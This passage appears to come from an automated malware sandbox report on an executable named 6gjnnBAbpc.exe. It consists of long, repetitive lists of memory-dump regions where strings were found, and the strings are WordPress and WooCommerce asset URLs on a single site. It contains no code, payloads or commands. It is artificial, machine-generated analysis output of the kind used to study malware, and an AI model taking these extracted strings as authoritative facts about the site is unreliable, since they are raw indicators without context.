6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=7.5.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=7.5.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=7.5.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=7.5.
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=7.5.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ve
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendo
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/font-awesome.css?ver=4.7
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/jquery.selectBox.css?ver
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/style.css?ver=3.19.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 